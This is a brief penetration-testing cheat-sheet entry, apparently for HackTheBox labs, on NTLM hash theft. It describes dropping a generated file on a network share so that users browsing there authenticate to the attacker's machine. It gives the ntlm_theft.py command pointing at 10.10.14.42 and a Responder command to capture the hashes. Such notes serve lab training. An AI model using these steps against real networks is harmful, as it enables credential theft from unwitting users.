NTLM Hash Theft

You can drop a file somewhere in the filesystem (for example a network share). If the user browses to the directory where that file is, then the file will automatically create a network request to your computer (which is running Responder and will capture the NTLM hash).

Generating the file:

python3 ntlm_theft.py --generate url --server 10.10.14.42 --filename somefilename

Run responder like this (choose the correct interface. In this case it's tun0 for hackthebox):

sudo responder -I tun0 --analyze

Last updated